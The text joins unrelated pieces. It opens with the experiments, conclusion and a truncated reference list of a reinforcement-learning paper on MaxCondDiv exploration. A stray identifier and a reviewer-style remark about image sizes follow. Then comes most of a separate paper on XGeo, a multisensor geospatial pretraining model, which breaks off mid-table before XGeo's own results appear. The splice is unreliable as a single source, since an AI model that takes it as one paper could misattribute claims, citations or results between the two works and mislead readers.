In this section, we experiment with MountainCar and Maze, using Q-learning as the oracle, and compare against the MaxEnt principle and a random policy. For the MaxEnt principle, we adopt the MSEE of Hazan et al. (2019). The agent is trained for 100 episodes, i.e., around 50,000 steps.

Figure 3: Trajectories of different trained policies on MountainCar and Maze. The flag positions are indicated by red vertical lines. Both MaxEnt and MaxCondDiv can facilitate environment exploration to achieve a defined goal. MaxEnt emphasizes uniform visits to all states, while our MaxCondDiv strategy involves maintaining distance from starting points.

In Figure 3 (top-left), we illustrate the MountainCar environment, where the most challenging state to explore is indicated by the flag. We execute the trained policies and visualize their trajectories as kernel-density-estimate heatmaps (a minimal sketch of this visualization step is given at the end of this subsection). As expected, the random policy fails to reach the flag and remains close to the starting points. Although MaxEnt can reach the flag, it focuses more on states near the starting point. In contrast, MaxCondDiv reaches the flag more frequently but tends to ignore regions near visited states. In Maze, as shown in Fig. 3, the agent drives the red point to explore the maze. We record trajectories for 50,000 steps, resetting the agent to the start point every 1,000 steps. The random policy remains near the start point, while MaxEnt explores the entire state space evenly. Our MaxCondDiv also explores the entire maze, but tends to stay away from the start point. In the heatmap of MaxCondDiv, the probability at the start point is much lower than at challenging states, such as the top-right and bottom-right corners, indicating that our method has a higher probability of "reaching the boundary".
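For reference, the heatmap visualizations used in Figures 3 and 4 can be produced with a standard kernel density estimate. A minimal sketch, assuming `traj` is a (T, 2) array of visited states from a rollout:

```python
import numpy as np
from scipy.stats import gaussian_kde
import matplotlib.pyplot as plt

def trajectory_heatmap(traj, grid=200):
    # Fit a 2-D Gaussian KDE to the visited states and render its density.
    kde = gaussian_kde(traj.T)                 # gaussian_kde expects (d, N) data
    xs = np.linspace(traj[:, 0].min(), traj[:, 0].max(), grid)
    ys = np.linspace(traj[:, 1].min(), traj[:, 1].max(), grid)
    X, Y = np.meshgrid(xs, ys)
    Z = kde(np.vstack([X.ravel(), Y.ravel()])).reshape(X.shape)
    plt.imshow(Z, origin="lower", extent=[xs[0], xs[-1], ys[0], ys[-1]])
    plt.colorbar(label="visit density")
```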
4.3 RESULTS ON MUJOCO

Figure 4: Trajectories of various trained policies on Mujoco. Consistent with prior findings, our MaxCondDiv approach is characterized by a deliberate maintenance of distance from visited states.

Mujoco is an advanced physics simulator with continuous state and action spaces and multiple tasks, from which we select Hopper, HalfCheetah, and Ant. In our experiments, observation noise is introduced by rounding state and action values to two decimal places, and the RL backbone is a PPO agent. Details of the hyper-parameters are in Appendix B. The agent is trained for 1,000 episodes, i.e., 1,000,000 steps in total, and restarts from the initial state with uniform noise in each episode.

Divergence vs Entropy. We depict the distribution of states visited within 10,000 steps by the trained agents in Fig. 4. For Hopper and HalfCheetah, we visualize the first two state dimensions (for Hopper, the z-coordinate of the front tip and the top angle); for Ant, we visualize the x-y coordinates. In Hopper, our method outperforms the others and effectively learns the degrees of freedom necessary to walk forward or backward. In HalfCheetah and Ant, MaxEnt explores a broad space, generating trajectories evenly distributed around the start point. Our MaxCondDiv diverges by concentrating exploration far from the start point, consistent with the radial exploration trajectories in our thought experiment.

Comparison to SOTA Exploration RL Approaches. We compare our method with a random policy, curiosity-driven exploration (ICM; Pathak et al., 2017), Exploration by Random Network Distillation (RND; Burda et al., 2019), Rényi State Entropy Maximization (RISE; Yuan et al., 2022), Exploration by Maximizing Rényi Entropy (MaxRényi), Maximum State Entropy Exploration (MSEE; Hazan et al., 2019), and a variant of our MaxCondDiv using the KL divergence. Similar to Hazan et al. (2019), we evaluate the exploration performance of trained agents via the number of visited states. It is widely accepted that a larger number of visited states results in improved performance on downstream tasks, because the agent can gather sufficient information (Jin et al., 2020). We execute the trained policy for 10,000 steps after every 100,000 steps of training, and depict the number of visited states in Fig. 5. MaxCondDiv outperforms the baseline methods in terms of exploration range and training speed. Furthermore, we carry out experiments on downstream tasks, commonly referred to as the "planning phase" within a reward-free RL framework (Jin et al., 2020). However, downstream-task results are significantly influenced by the offline RL algorithm subsequently employed, and are limited compared to online RL; consequently, we do not use them as our primary results but include them in Appendix C.5 for reference.

Learned Skills without Using Extrinsic Rewards. We include images depicting agent motions in Fig. 6. MaxCondDiv acquires a range of basic behaviors, such as jumping forward and flipping, without extrinsic rewards. Videos are provided in Appendix C.3 and the attached zip file.

5 CONCLUSION

We propose Maximum Conditional Divergence (MaxCondDiv), a model-free method for exploration without extrinsic rewards that estimates the difference between transition probabilities in two trajectory fractions using a conditional Cauchy-Schwarz divergence estimator. MaxCondDiv exhibits distinct exploration behaviors compared to the maximum entropy principle, and avoids the auxiliary-model selection bias observed in other curiosity-driven approaches. We evaluate MaxCondDiv in two discrete and three continuous environments, consistently achieving exploration of more states or successfully reaching challenging states.

REFERENCES

Susan Amin, Maziar Gomrokchi, Harsh Satija, Herke van Hoof, and Doina Precup. A survey of exploration methods in reinforcement learning. *arXiv preprint arXiv:2109.00157*, 2021.

Jihye Bae, Luis Sanchez Giraldo, Pratik Chhatbar, Joseph Francis, Justin Sanchez, and Jose Principe. Stochastic kernel temporal difference for reinforcement learning. In *2011 IEEE International Workshop on Machine Learning for Signal Processing*, pp. 1–6. IEEE, 2011.

Yuri Burda, Harrison Edwards, Amos Storkey, and Oleg Klimov. Exploration by random network distillation. In *International Conference on Learning Representations*, 2019.

Christian Cachin. *Entropy measures and unconditional security in cryptography*. PhD thesis, ETH Zurich, 1997.

Thomas M Cover. *Elements of information theory*. John Wiley & Sons, 1999.

Laura Ekroot and Thomas M Cover. The entropy of markov trajectories. *IEEE Transactions on Information Theory*, 39(4):1418–1421, 1993.

Tom Erez, Yuval Tassa, and Emanuel Todorov. Infinite-horizon model predictive control for periodic tasks with contacts. *Robotics: Science and systems VII*, pp. 73, 2012.

Benjamin Eysenbach, Abhishek Gupta, Julian Ibarz, and Sergey Levine. Diversity is all you need: Learning skills without a reward function.
In *International Conference on Learning Representations*, 2019. Claude-Nicolas Fiechter. Efficient reinforcement learning. In *Proceedings of the seventh annual conference on Computational learning theory*, pp. 88–97, 1994. Justin Fu, Aviral Kumar, Ofir Nachum, George Tucker, and Sergey Levine. D4rl: Datasets for deep data-driven reinforcement learning. *arXiv preprint arXiv:2004.07219*, 2020. Scott Fujimoto, David Meger, and Doina Precup. Off-policy deep reinforcement learning without exploration. In *International conference on machine learning*, pp. 2052–2062. PMLR, 2019. Arthur Gretton, Karsten M Borgwardt, Malte J Rasch, Bernhard Schölkopf, and Alexander Smola. A kernel two-sample test. *The Journal of Machine Learning Research*, 13(1):723–773, 2012. Tuomas Haarnoja, Aurick Zhou, Pieter Abbeel, and Sergey Levine. Soft actor-critic: Off-policy maximum entropy deep reinforcement learning with a stochastic actor. In *International conference on machine learning*, pp. 1861–1870. PMLR, 2018. Elad Hazan, Sham Kakade, Karan Singh, and Abby Van Soest. Provably efficient maximum entropy exploration. In *International Conference on Machine Learning*, pp. 2681–2691. PMLR, 2019. Roger A Horn and Charles R Johnson. *Matrix analysis*. Cambridge university press, 2012. Chi Jin, Akshay Krishnamurthy, Max Simchowitz, and Tiancheng Yu. Reward-free exploration for reinforcement learning. In *International Conference on Machine Learning*, pp. 4870–4879. PMLR, 2020. Kittipat Kampa, Erion Hasanbelliu, and Jose C Principe. Closed-form cauchy-schwarz pdf divergence for mixture of gaussians. In *The 2011 International Joint Conference on Neural Networks*, pp. 2578–2585. IEEE, 2011. Diederik P Kingma and Max Welling. Auto-encoding variational bayes. In *International conference on learning representations*, 2014. Aviral Kumar, Aurick Zhou, George Tucker, and Sergey Levine. Conservative q-learning for offline reinforcement learning. *Advances in Neural Information Processing Systems*, 33:1179–1191, 2020. Douglas Bruce Lenat. *AM: an artificial intelligence approach to discovery in mathematics as heuristic search*. Stanford University, 1976.
qWSk62REeK
> XGeoSet, encompassing over 2 million images. You should state the size of the images (on average if they are heterogeneous). 2 million 1024x1024 images is a lot different than 2 million 128x128 images.
MULTISENSORY GEOSPATIAL MODELS VIA CROSS-SENSOR PRETRAINING

Anonymous authors Paper under double-blind review

ABSTRACT

Geospatial remote sensors, spanning optical and microwave sensors, exhibit significant diversity and provide unique capabilities due to their different observing mechanisms. By integrating multi-sensor data through fusion, researchers can harness the complementary and synergistic nature of optical and microwave data to achieve more accurate and efficient Earth monitoring. Despite the proven enhancements that geospatial pretraining models bring to various downstream tasks, most research focuses primarily on a single sensor modality. Thus, to unlock these synergies, we introduce a multi-sensor geospatial pretraining model, XGeo, pretrained with four sensor modalities: RGB channels, Sentinel-2, Synthetic Aperture Radar (SAR), and Digital Surface Model (DSM) data, encompassing a total of two million multi-sensor images. Our method is equipped to manage both paired and unpaired data effectively. When data originate from the same geolocation, we cross-link the corresponding sensors in the masked image modeling objective, which facilitates the learning of a joint representation from multiple sensors. In addition, we utilize mixture-of-experts layers and heterogeneous batches to mitigate data heterogeneity. Our experiments show that XGeo enhances performance on both single-sensor and multisensor downstream tasks, such as land-use classification, segmentation, cloud removal, and pan-sharpening. We also reveal that representations from natural images differ from those of some geospatial remote sensors, which renders the use of existing representations less effective. Our work serves as a comprehensive guide for developing robust multisensor geospatial pretraining models, paving the way for more advanced geospatial capabilities.

1 INTRODUCTION

Geospatial remote sensors exhibit considerable diversity (Figure 1), with reported spatial (Qiu et al., 2013) and feature heterogeneity (Vanderhoof et al., 2023; Xu et al., 2022a). Two principal categories emerge based on their imaging mechanisms: optical sensors (e.g., Sentinel-2 (Drusch et al., 2012) and LiDAR) and microwave sensors (e.g., Synthetic Aperture Radar (Fornaro & Pascazio, 2014)). These sensors vary significantly in their observation methods and capabilities. Optical remote sensing captures reflected and absorbed electromagnetic radiation in the visible and near-infrared spectrum, yielding high-resolution imagery and surface property information. Conversely, microwave remote sensing operates at longer wavelengths, penetrating clouds and vegetation to reveal subsurface features and structural properties (Musa et al., 2015) (Figure 1). A multi-sensor fusion approach combines the strengths of both optical and microwave remote sensing, offering a more comprehensive and accurate understanding of the Earth's surface (Schmitt et al., 2017). By integrating data from multiple sensors, researchers can leverage the complementary nature of optical and microwave data to overcome limitations and obtain a more complete picture. For instance, combining optical and microwave data can help estimate soil moisture content, which is crucial for ecosystem management (Jung et al., 2017; Gottfriedsen et al., 2021). Multi-sensor fusion also enhances the accuracy of topographic mapping by incorporating both surface features captured by optical sensors and elevation information derived from microwave sensors.
Numerous multisensor fusion deep learning models have been proposed for individual tasks, such as cloud removal (Xu et al., 2022b; He et al., 2021b), biomass estimation (Ghosh & Behera, 2018), and landcover segmentation (Cha et al., 2021; Hu et al., 2023). These studies substantiate the performance gains achievable by geospatial models incorporating multisensor modalities.

Figure 1: Examples of four sensor modalities: SAR, Sentinel-2, RGB, DSM. Here, each pair of {SAR & Sentinel-2} and {RGB & DSM} is colocated at the same geolocation. In the Sentinel-2 example, only the blue, green, and red bands are shown for ease of visualization.

Despite these important synergies, most geospatial pretrained models focus predominantly on a single modality (Mendieta et al., 2023; Wang et al., 2022a; Cong et al., 2022; Mañas et al., 2021; Sun et al., 2022). While studies like Liu et al. (2022a), Chen & Bruzzone (2022), and Scheibenreif et al. (2022) employ Sentinel-2 and SAR for pretraining via contrastive learning, these methodologies are inherently limited by the need for paired sensor modalities. This limitation restricts the efficient utilization of the abundant unpaired sensor modalities that are widely available in real-world scenarios. By establishing a multisensor pretrained model scalable to both paired and unpaired sensors, a unified framework for analyzing multisensor remote sensing data can be provided. Such a model can be fine-tuned or used as a feature extractor to interpret multisensor data effectively. Therefore, our paper develops a novel multi-sensor geospatial pretraining model that can potentially scale to many sensor modalities, paired or not. To the best of our knowledge, it is the first multi-sensor geospatial pretraining model of its kind. Additionally, our paper seeks to address several unexplored questions in the realm of multisensor geospatial models. A natural inquiry arises: How can joint representations between corresponding sensors be learned by employing masked image modeling techniques? In geospatial tasks within the RGB domain, it is typical to leverage backbones pretrained on ImageNet (Risojevic & Stojnic, 2021; Wang et al., 2022b) or to utilize features distilled from such models (Mendieta et al., 2023). Given this, we inquire: Does leveraging or distilling features from established vision models enhance multisensor geospatial pretraining? Lastly, a practical concern emerges: How can multisensor heterogeneity be mitigated during pretraining? In this paper, we aim to address the aforementioned questions and provide insights into effectively pretraining multisensor geospatial models. Our contributions can be summarized as follows:

• We introduce a novel cross-sensor paradigm, XGeo, for joint representation learning. This paradigm harmonizes diverse representations and empowers multisensor models to effectively discern the complex relationships between corresponding sensors.

• We unveil a high-performing pretrained model, trained on a comprehensive multisensor dataset, XGeoSet, encompassing over 2 million images. This model integrates four sensor modalities: RGB images, multispectral images, SAR, and DSM, demonstrating superior performance across several multisensor downstream tasks.
• Furthermore, we report previously undocumented findings that several methods augment the model's performance: (1) the incorporation of MoE and heterogeneous batching effectively harmonizes diverse representations from optical and microwave sensor types; (2) pretraining from scratch yields superior results compared to leveraging existing foundation models.

2 RELATED WORK

Geospatial pretraining. As pretrained models continue to revolutionize the fields of vision and natural language processing, their potential in the geospatial sphere is becoming increasingly evident. These models have demonstrated remarkable effectiveness in enhancing deep learning models applied to downstream tasks (Neumann et al., 2019; Mañas et al., 2021; Cong et al., 2022; Ayush et al., 2020; Mendieta et al., 2023). The geospatial domain has seen the emergence of two main self-supervised pretraining paradigms. The first centers around contrastive learning (Mañas et al., 2021; Ayush et al., 2020; Liu et al., 2022a). In this technique, the loss function is crafted to incentivize the model to draw similar or positive pairs closer together in the embedding space while pushing dissimilar or negative pairs further apart (Chen et al., 2020). However, identifying appropriate augmentations for contrastive methods presents a significant challenge. Certain augmentations of geospatial images, which significantly alter the image's intensity, can lead to undesirable outcomes (Neumann et al., 2019). Various implementations of contrastive pretraining incorporate temporal and spectral augmentation (Mañas et al., 2021), while others apply a colorization objective (Vincenzi et al., 2020). Although works such as Liu et al. (2022a), Chen & Bruzzone (2022), and Scheibenreif et al. (2022) treat colocated Sentinel-2 and SAR as positive pairs, these approaches are restricted to paired sensor modalities and do not efficiently leverage the wide range of unpaired sensor modalities. Given these augmentation constraints (Neumann et al., 2019), alternative methods have been developed, employing Masked Image Modeling (MIM) (Cong et al., 2022; Mendieta et al., 2023; Sun et al., 2022), which relies on simple spatial augmentations such as flipping and cropping. MIM not only requires less stringent augmentations but also outperforms its contrastive learning counterparts (Mendieta et al., 2023; Cong et al., 2022; Sun et al., 2022). However, most prior studies focus on remote sensing imagery in the visible spectrum or employ a single sensor modality (Mendieta et al., 2023; Wang et al., 2022a; Cong et al., 2022; Mañas et al., 2021). Alternatively, they are confined to paired sensors due to the inherent limitations of contrastive learning (Liu et al., 2022a; Chen & Bruzzone, 2022; Scheibenreif et al., 2022). In this work, we develop our pretraining objective based on a masked image modeling approach, akin to (Xie et al., 2021; He et al., 2021a). We demonstrate that our model can be pretrained with four sensor modalities, taking advantage of unpaired sensors.

Multi-source learning in language and vision communities.
Multi-source learning is a prevalent strategy when handling multi-modal tasks (Shen et al., 2023; Zhu et al., 2022) or multitask challenges in both the language and vision domains (Chen et al., 2022; Aoki et al., 2022; Liang et al., 2022; Aghajanyan et al., 2021; Lample & Conneau, 2019; Conneau et al., 2020; Bachmann et al., 2022). This technique exploits data from diverse sources to bolster the learning process and enhance model performance. Notable examples are multilingual pretrained models, such as XLM (Lample & Conneau, 2019) and its derivatives (Conneau et al., 2020; Chi et al., 2022). These models are pretrained at large scale on multilingual datasets to generate unsupervised cross-lingual representations (Conneau et al., 2020; Lample & Conneau, 2019). This approach enables the models to develop a unified representation across multiple languages, thereby enhancing their performance on cross-lingual tasks. Furthermore, the batching strategy has been identified as an essential aspect of creating generalizable representations and preventing collapse in multilingual models (Aghajanyan et al., 2020; 2021). Simultaneously, the Mixture-of-Experts (MoE) strategy (Shazeer et al., 2017) has been utilized to enhance multi-source learning in both multitask learning (Chen et al., 2022; Aoki et al., 2022; Liang et al., 2022) and language-vision pretraining (Shen et al., 2023; Zhu et al., 2022). In the specific context of multisensor geospatial pretraining, heterogeneity can originate from the use of different sensor types (e.g., optical, microwave) or different platforms (e.g., various satellites). Properly addressing this heterogeneity is crucial, as it can significantly influence the performance of the pretraining model (Aghajanyan et al., 2021). To meet this challenge, we draw inspiration from works in computer vision (Riquelme et al., 2021) and natural language processing (Aghajanyan et al., 2021; Lample & Conneau, 2019), and incorporate techniques such as cross-sensor representation learning into XGeo.

3 CROSS-SENSOR GEOSPATIAL PRETRAINING

In this section, we present the multisensor pretraining paradigm. Following (Mendieta et al., 2023), we employ SimMIM (Xie et al., 2021) with a Swin Transformer (Liu et al., 2021; 2022b) backbone. Figure 2 presents an overview of the cross-sensor geospatial pretraining methodology.

3.1 INPUT REPRESENTATION

Distinct embedding layers for each sensor. We consider $N$ sensor modalities, with each sensor having a corresponding number of channels, denoted as $\{C_i\}_{i=1...N}$. Taking into account the unique number of channels associated with each sensor (some examples are shown in Table 1), we utilize individual patch embeddings tailored to each specific sensor. This approach allows the model to efficiently process and learn from the distinct characteristics of various sensor modalities.

Figure 2: Overview diagram of XGeo. Each sensor is fed through a separate patch embedding layer (Section 3.1) and through the same encoder. During reconstruction, separate decoders are used. If the sensors are paired, with some probability the model reconstructs the corresponding paired sensor instead of itself (Section 3.2). Other best practices can be found in Section 3.4.

To elaborate, for the image from the $i$-th sensor, $\mathbf{I} \in \mathbb{R}^{W \times H \times C_i}$, we first divide it into square patches of size $P$, resulting in $\mathbf{T}_i \in \mathbb{R}^{L \times P^2 \times C_i}$.
Here, $W$ and $H$ represent the width and height of the images, while $L$ denotes the number of patches. We then apply corresponding linear embedding layers, $\{f_i\}_{i=1...N}: \mathbb{R}^{L \times P^2 \times C_i} \rightarrow \mathbb{R}^{L \times C_e}$, to the patches $\mathbf{T}_i$, projecting them to an embedding space of dimension $C_e$. The function $f_i$ represents the embedding layer for images from the $i$-th sensor. In our work, $C_e$ is the same for all sensors. Intuitively, to address the channel heterogeneity among the various sensor modalities, each sensor modality passes through a separate trainable embedding layer that unifies the representation dimension before the shared encoder.

### 3.2 Cross-sensor Pretraining

**Shared encoder for all sensor modalities.** The embedded patches obtained from $\{f_i\}_{i=1...N}$, in $\mathbb{R}^{L \times C_e}$, are then masked and fed through the encoder. The masking strategy employed in our approach is the same as that used in (Xie et al., 2021). By having separate patch embedding layers ($f_i$) for each sensor, the model can learn the unique characteristics of each sensor modality. The learned embeddings from all sensors are then integrated through the same encoder, enabling the model to effectively learn joint representations and handle multisensor geospatial data.

**Separate decoder for each sensor and cross-sensor prediction.** Collecting data from different sensors at the same geolocation is common practice in the geospatial domain. Learning joint representations of such multisensor data can prove beneficial for various downstream tasks. Although contrastive learning has demonstrated promise in learning effective representations, its performance may be limited due to the lack of suitable data augmentations for remote sensing images. To address this issue, we propose employing cross-sensor strategies in the context of MIM to learn joint representations for multisensor geospatial data. For instance, when the model is fed masked images from DSM, it can predict the masked patches of the DSM itself or of the corresponding RGB image. An example pair of DSM and RGB images is shown in the two right panels of Figure 1. This encourages the model to align the different sensor representations. Accordingly, our model incorporates a different decoder for each sensor. Specifically, if there exists a pair of images from the $i$-th and $j$-th sensors, $\{I_i \in \mathbb{R}^{W \times H \times C_i}, I_j \in \mathbb{R}^{W \times H \times C_j}\}$, the model processes the masked images as follows:

$$I'_i = D_i(En(f_i(I_i))) \text{ or } I'_j = D_j(En(f_i(I_i))), \quad \text{and} \quad I'_j = D_j(En(f_j(I_j))) \text{ or } I'_i = D_i(En(f_j(I_j))), \tag{1}$$

where $En : \mathbb{R}^{L \times C_e} \rightarrow \mathbb{R}^{L \times C_m}$ is the shared encoder, and $C_m$ is the embedding dimension of the final layer of the encoder. $I'_i$ and $I'_j$ are the predicted $i$-th and $j$-th sensor images, respectively, and $D_i : \mathbb{R}^{L \times C_m} \rightarrow \mathbb{R}^{W \times H \times C_i}$ is the decoder that reconstructs the $i$-th sensor image. Equation (1) shows that the pretraining model either reconstructs the input sensor itself or its paired sensor image.
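To illustrate the routing in Equation (1), below is a minimal PyTorch sketch with per-sensor embeddings $f_i$, a shared encoder $En$, and per-sensor decoders $D_i$. The toy Transformer encoder, the layer sizes, and the 50% crossing probability are illustrative assumptions; the actual backbone is SwinV2 with SimMIM-style masking.

```python
import random
import torch.nn as nn

class CrossSensorSketch(nn.Module):
    def __init__(self, channels, patch=16, c_e=128):
        super().__init__()
        # One patch embedding f_i and one decoder D_i per sensor; a shared encoder En.
        self.embed = nn.ModuleList(nn.Linear(patch * patch * c, c_e) for c in channels)
        self.encoder = nn.TransformerEncoder(   # stand-in for the SwinV2 backbone
            nn.TransformerEncoderLayer(c_e, nhead=4, batch_first=True), num_layers=2)
        self.decode = nn.ModuleList(nn.Linear(c_e, patch * patch * c) for c in channels)

    def forward(self, patches_i, i, j=None, p_cross=0.5):
        # patches_i: (B, L, patch*patch*C_i), masked patches from sensor i.
        z = self.encoder(self.embed[i](patches_i))      # En(f_i(I_i))
        # With probability p_cross, decode the paired sensor j instead of sensor i.
        target = j if (j is not None and random.random() < p_cross) else i
        return self.decode[target](z), target           # D_target(En(f_i(I_i)))
```

The L1 (MIM) loss is then taken against the masked patches of the `target` sensor; passing `j=None` recovers the unpaired, self-reconstruction case described next.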
If there is no paired sensor in the pretraining dataset, the model reconstructs the input in the conventional way:

$$I'_i = D_i(En(f_i(I_i))).$$

This approach capitalizes on the inherent relationship between different sensors observing the same location, enabling the model to capture complementary information. Furthermore, it provides flexibility in handling scenarios where no paired sensors are available, allowing for greater adaptability in choosing the pretraining dataset. This is particularly advantageous given that multimodal geospatial datasets are less prevalent than single-sensor datasets.

### 3.3 Pretraining data

Table 1: Breakdown of the datasets in our pretraining data. We gather approximately 2M samples from a combination of labeled and unlabeled satellite imagery with various ground sample distances and sensor modalities.

| Dataset | # Images | GSD | Sensor modality | # Channels | Paired sensors? |
|-------------|----------|-----------|--------------------------|------------|-----------------|
| GeoPile | 600K | 0.1m - 30m| RGB$^a$ | 3 | ✗ |
| MillionAID | 1M | 0.5m - 153m| RGB$^a$ | 3 | ✗ |
| SEN12MS | 320K | 10m | SAR / Sentinel-2 | 2/14 | ✓ |
| MDAS | 40K | 0.1m - 10m| DSM / RGB$^b$ | 1/3 | ✓ |

$^a$ Not sourced from a single sensor; instead, it amalgamates sensor images from an array of satellites, including NAIP, GeoEye, WorldView, QuickBird, IKONOS, and SPOT, among others. $^b$ Derived from airborne sources ([Hu et al., 2023](#)). For more in-depth details regarding the RGB modality, please refer to Appendix A.2.

Our multisensor pretraining dataset, XGeoSet, comprises four sensor modalities and totals 2 million images through the inclusion of additional geospatial data. The detailed composition of XGeoSet is presented in Table 1. Specifically, XGeoSet incorporates SEN12MS ([Schmitt et al., 2019](#)), a dataset enriched with paired SAR and Sentinel-2 satellite images from all meteorological seasons, to augment data diversity. All sensors in this dataset are ortho-rectified ([Schmitt et al., 2019](#)). Additionally, we have integrated DSM and RGB images from the MDAS dataset ([Hu et al., 2023](#)), resized to a dimension of 384. It is noteworthy that, although the Sentinel-2 modality does encompass RGB channels among its imaging bands, the RGB modality is distinguished and separated because its expansive dataset extends beyond the Sentinel-2 sensor, exhibiting varied Ground Sample Distances (GSD) and high feature entropy, two attributes that have been validated as impactful during pretraining ([Mendieta et al., 2023](#); [Cong et al., 2022](#)). Excluding the RGB modality from our pretraining dataset results in a decrease in efficacy compared to including it (Appendix A.2). The enhanced version of XGeoSet with RGB (GeoPile ([Mendieta et al., 2023](#)) and MillionAID ([Long et al., 2021](#))) demonstrates elevated performance on the 7 downstream tasks outlined in GFM ([Mendieta et al., 2023](#)) under identical settings (see Appendix A.1). To optimize XGeoSet-RGB, we experimented with diverse datasets (see Appendix A.1).

### 3.4 Best Practices in Pretraining

**MoE for multisensor learning.** A shared encoder can present challenges when it comes to efficiently learning each sensor's representation. To tackle this issue, we propose integrating the sparsely gated Mixture-of-Experts (MoE) approach (Shazeer et al., 2017) to replace the MLP layers within the encoder.
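As one possible instantiation, a sparsely gated MoE layer of the kind that could replace an encoder MLP block is sketched below. The top-1 gating and the simple load-balancing auxiliary term follow the spirit of Shazeer et al. (2017), but the sizes and the exact auxiliary form are illustrative assumptions.

```python
import torch
import torch.nn as nn

class SparseMoE(nn.Module):
    """Top-1 sparsely gated mixture of experts over token embeddings."""
    def __init__(self, dim, n_experts=8, hidden=512):
        super().__init__()
        self.gate = nn.Linear(dim, n_experts)
        self.experts = nn.ModuleList(
            nn.Sequential(nn.Linear(dim, hidden), nn.GELU(), nn.Linear(hidden, dim))
            for _ in range(n_experts))

    def forward(self, x):                      # x: (B, L, dim)
        logits = self.gate(x)                  # (B, L, E)
        probs = logits.softmax(-1)
        top_p, top_i = probs.max(-1)           # top-1 expert per token
        out = torch.zeros_like(x)
        for e, expert in enumerate(self.experts):
            mask = top_i == e                  # tokens routed to expert e
            if mask.any():
                out[mask] = top_p[mask].unsqueeze(-1) * expert(x[mask])
        # Load-balancing auxiliary loss: encourage uniform expert usage.
        load = probs.mean(dim=(0, 1))          # (E,)
        aux = (load * load).sum() * len(self.experts)
        return out, aux
```

The returned `aux` term plays the role of the auxiliary loss $L_{\text{auxiliary}}$ that enters the total pretraining objective below with weight $\lambda$.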
Our pretraining loss function, $L$, combines an L1 reconstruction loss (Xie et al., 2021; He et al., 2021a) (i.e., the MIM loss) with auxiliary losses (Hwang et al., 2022; Riquelme et al., 2021):

$$L = L_{\text{MIM}} + \lambda L_{\text{auxiliary}},$$

where $\lambda$ represents the weight of the auxiliary losses. In practice, we use $\lambda = 0.01$.

**Pretraining Method.** We utilize heterogeneous batches during pretraining, a method initially introduced by Muppet (Aghajanyan et al., 2021). This method is typically employed in multitask learning, where it aims to create a consolidated representation across diverse tasks during model training, notwithstanding their differing learning objectives. Our findings suggest that this method can also be effectively applied to multisensor geospatial pretraining (Section 4.4); a minimal sketch of the batching scheme is given at the end of this subsection. In each batch, data from all sensors are loaded in sequence, ensuring that the optimization of our model encompasses all tasks (Aghajanyan et al., 2021). To elaborate, each batch can be depicted as a set:

$$\{I_i \in \mathbb{R}^{W \times H \times C_i}\}_{i=1...N}.$$

Moreover, in light of the distinct imaging mechanisms inherent to these sensors, we opt to perform pretraining from scratch (Section 4.3).
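The sketch below illustrates the heterogeneous batch construction: every optimization step yields one batch containing samples from all $N$ sensor datasets. The dataset objects and the per-sensor batch size are assumptions for illustration.

```python
from torch.utils.data import DataLoader

def _repeat(loader):
    # Cycle through a DataLoader indefinitely, reshuffling each epoch.
    while True:
        for batch in loader:
            yield batch

def heterogeneous_batches(datasets, per_sensor_bs=16):
    # datasets: dict mapping sensor name -> torch Dataset.
    loaders = {name: _repeat(DataLoader(ds, batch_size=per_sensor_bs, shuffle=True))
               for name, ds in datasets.items()}
    while True:
        # One heterogeneous batch: per-sensor tensors optimized jointly in one step.
        yield {name: next(it) for name, it in loaders.items()}
```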
4 EXPERIMENTS

**Experimental Settings.** All of our experiments are conducted using a SwinV2-base architecture (Liu et al., 2022b) with a patch size of 16×16 pixels and 8 experts. The models are pretrained for either 100 epochs (for ablation studies) or 800 epochs (to achieve optimal results and maintain comparability with state-of-the-art methods). Where specified, 1% BEN and 1% SEN12MS-CR are also employed for ablation studies. We utilize 8 NVIDIA V100 GPUs with a batch size of 2048 (128 per GPU) and an image size of 192×192. All pretraining settings follow the configurations described in (Mendieta et al., 2023). Detailed pretraining settings and pretraining reconstruction visualizations can be found in Appendix B.1 and Appendix B.2, respectively.

**Downstream Evaluation.** Upon completion of pretraining, we fine-tune and assess the model on a diverse range of downstream multisensor datasets. This aims to provide a comprehensive understanding of the model's performance potential across various tasks (refer to Section 4.1 for task details). Table 2 provides an overview of the downstream evaluation tasks, together with their respective sensor modalities. Among these tasks, the use of multisensor data can enhance the performance of land classification and segmentation, while cloud removal is inherently dependent on multisensor modalities and cannot be effectively tackled without them. Although pan-sharpening requires only one optical sensor, it relies heavily on multi-spectral images. Detailed settings for these downstream tasks can be found in Appendix C.2.

Table 2: Downstream tasks, covering various use cases in the geospatial domain with a range of ground sample distances and sensor modalities.

| Dataset | Application | GSD | Sensor modality | # Channels |
|------------------|---------------------|---------|-----------------------|------------|
| BigEarthNet | Scene classification | 10m - 60m| SAR / Sentinel-2 | 2/14 |
| Vaihingen | Land segmentation | 0.09m | DSM / RGB | 1/3 |
| SEN12MS-CR | Cloud removal | 10m - 60m| SAR / Sentinel-2 | 2/14 |
| SpaceNet | Pan-sharpening | 0.1m - 10m| WorldView-3 | 8 |

4.1 GEOSPATIAL DOWNSTREAM EVALUATION

**Scene classification.** One prevalent remote sensing application is classification. We evaluate our pretraining model on BigEarthNet (BEN) (Sumbul et al., 2019), a dataset extensively used in the literature (Mañas et al., 2021; Cong et al., 2022; Chen et al., 2020; Wanyan et al., 2023; Mendieta et al., 2023). BEN (Sumbul et al., 2019) is a large-scale remote sensing dataset specifically designed for multi-label classification tasks. The data includes pairs of 12-band Sentinel-2 images along with their corresponding 2-band SAR images. We employ the data split and 19-class evaluation, as is standard in the literature (Neumann et al., 2019; Mañas et al., 2021; Cong et al., 2022; Mendieta et al., 2023).

Table 3: Quantitative results on all the downstream tasks (Table 2) for XGeo (ours) compared to other pretrained models. Results are reproduced from previous reports.

| Methods | BEN 10% mAP (↑) | BEN 100% mAP (↑) | SEN12MS-CR MAE (↓) | SEN12MS-CR SAM (↓) | SEN12MS-CR SSIM (↑) | SpaceNet PSNR (↑) | SpaceNet SSIM (↑) | Vaihingen mIOU (↑) |
|---------------|-----------------|------------------|--------------------|---------|----------|----------|----------|-------------------|
| SeCo | 82.6 | 87.8 | - | - | - | - | - | 68.9 |
| SatMAE | 82.1 | - | - | - | - | 22.742 | 0.621 | 70.6 |
| MoCoV2 | - | 89.3 | - | - | - | - | - | - |
| DINO-MC | - | 84.2 | - | - | - | - | - | - |
| GFM | 86.3 | - | - | - | - | 22.599 | 0.638 | 75.2 |
| Rammon | 82.6 | 86.2 | 0.048 | 14.78 | 0.572 | 21.825 | 0.594 | 67.0 |
| IN-22k | 85.7 | 89.5 | - | - | - | 21.655 | 0.612 | 74.7 |
